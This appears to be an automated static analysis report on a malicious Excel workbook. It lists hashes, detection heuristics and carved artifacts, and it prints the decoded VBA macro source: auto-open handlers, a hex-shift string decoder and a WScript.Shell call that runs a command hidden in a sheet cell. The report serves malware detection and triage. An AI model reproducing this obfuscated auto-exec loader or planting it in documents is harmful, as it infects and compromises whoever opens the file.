Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 cff90d6dbf2be8d2…

MALICIOUS

Office (OLE)

36.0 KB Created: 2018-04-13 02:00:39 Authoring application: Microsoft Excel First seen: 2018-07-27
MD5: 94714d27bf121ac0bcd056f00ccb7ccf SHA-1: f5ab01f10212f2aeae507d64083f7c341469a5e3 SHA-256: cff90d6dbf2be8d234247e7329b23e6d26c196dc77b570b44d1a5e05b808c3be
402 Risk Score

Heuristics 10

  • ClamAV: Xls.Malware.Valyria-6700358-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Valyria-6700358-0
  • Excel 4.0 (XLM) Auto_Open + macro sheet critical OLE_XLM_AUTOOPEN
    Workbook contains an Auto_Open / Auto_Close defined name together with an Excel 4.0 macro sheet — the canonical XLM auto-execution shape used by malware families such as Emotet and QakBot.
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 229 bytes
SHA-256: fcf35f1fa50ffd18156c14626785018e91b64741c3871fd95926ff05070e1aa6
Preview script
First 1,000 lines of the extracted script
' 0085     13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  XPNo
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9360 bytes
SHA-256: 645209b75981184b0397f4ff0b783ed1d74d52b9783240afec3593a780aa0292
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 20 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Sub WSWW_GHBC()
    PTS_OIC
End Sub
Public Function T_C(ByVal text As String)
   Dim JP_LQL As String
   Dim RIE_G As Long
   For RIE_G = 1 To Len(text) Step 2
        JP_LQL = JP_LQL & Chr(Asc(Chr("&H" & Mid(text, RIE_G, 2))) - 36)
   Next
   T_C = JP_LQL
End Function
Public Sub Auto_Open()
    Application.Run T_C("7B777B7B836B6C6667")
End Sub
Public Sub Document_Open()
    Application.Run T_C("7B777B7B836B6C6667")
End Sub
Public Sub PTS_OIC()
    Dim NZJ_J As Object: Set NZJ_J = VBA.CreateObject(T_C("7B7787968D949852778C899090"))
    Dim JK_RI As String
JK_RI = "636333634580637F49635E636387638663647C6C63784A7163636363A2635799636349636C57639863793447637F63639763A0726D636363636363439563A26363626C3D7784636370672785638A63636379766393638E63977D26632B5963A291639163639E43636363639A6397639A276"
Dim AKE_Y As String
AKE_Y = "35A3F76639A89639163638158633A63636341635062925A63846363352480636378636350636C2C63456349468863636368A363A263986363A34963636380636363873A457B2F63638D41633463632F634584A03263635B6363D651636352637563966363982F63917A5163634D635A6363"
Dim QS_Q As String
QS_Q = "4946D86363636C46EB7D8F638345636395633094638B632E63634B6348572D88634A636350664F63636363636F932C638570633C6366716363636363864986486363636368636363636CA19263586363636F63633F95999F63636363834A63316DA12B375B4D63638E63628242635C63639"
Dim WO_JLR As String
WO_JLR = "59563456363634B8963636363637A63633A6393636363306363573B814C636359633D63586363636363636345635763636338485D63342B94632A6363636363778663636363636263636F6363726362265B637563969F63636343636358636A632863634163636363637072776369466E63"
Dim OSL_EW As String
OSL_EW = "A16363876363632B634063639A6365286363636344768B6394264A5064776363636363639999696363392D63376383633073637E88634F7F63636363786363859A637E635C9C46312E6D636363A044639C63635B7C636363636363427263405B63636363335B7B6363478A3D626363635D4"
Dim EK_U As String
EK_U = "E4285632F63635B636363306363935663638F6363843F9263639C63637A637F636343638C637235637D83A34E632963636E86636363638D6863386363638863A263638F9B637D63636333517F63636352308B63632C746398636363636363923F63493E638763843E63639582329463608D"
Dim Z_HRY As String
Z_HRY = "6363639A6354639C6463636343633663636363635E636563539C5139634F63636363637C27636363907D6A63696363637074634F6363936363636B452763393B38754A636363245E7582636363586381638D6363636063698B826363635563556363386363636363646333634E3785633B6"
Dim A_A As String
A_A = "3638863A36399636363338C488663516C5B2E636363636350633F78632598636368636363444B3A67926363636358816363262963636376637D6863814A635B636A5B6363639D74629D636E776363632F636376666363635B63347E63A1266663637E63639D4D632A9D3928633E81734963"
Dim ZKE_RQY As String
ZKE_RQY = "6393634763666352436363756363635E3C267F63374D9A5B638D45636C638B51633A5F6363636D636F2E3063636D2F63257F635A636363A28758444163637C6398246363636D44366363438D912F9E636361305D63637F654A8F634C63894E634F64637163635E63656363357C636C634F6"
Dim DXT_CQJ As String
DXT_CQJ = "3708963427E9F936396633B86636563686263637B8927636339376363715E638B6396635D636363634EA06363635228758C3F9E328C3F63637E63A32D634B8E729F7B632F915F632D825E63396369636363636391632E63632B51336C638478616378599763635194946351636363396963516379638563712B928A316363936355636E637475633B6363A02B63433A373B63636363644F63638F63A14363647787636348638D6E6363246395637C76636356636C566343848D637C63634B63"

    NZJ_J.Run T_C(ThisWorkbook.Sheets("XPNop").Range("J225").Value), 0, True
End Sub
Sub Workbook_Open()
    Application.Run "ThisWorkbook." & T_C("7B777B7B836B6C6667")
End Sub

' Processing file: /opt/analyzer/scan_staging/2290ff7649bc432b9af5765b1e42ab24.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/ThisWorkbook - 8003 bytes
' Line #0:
' 	Option  (Explicit)
' L
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.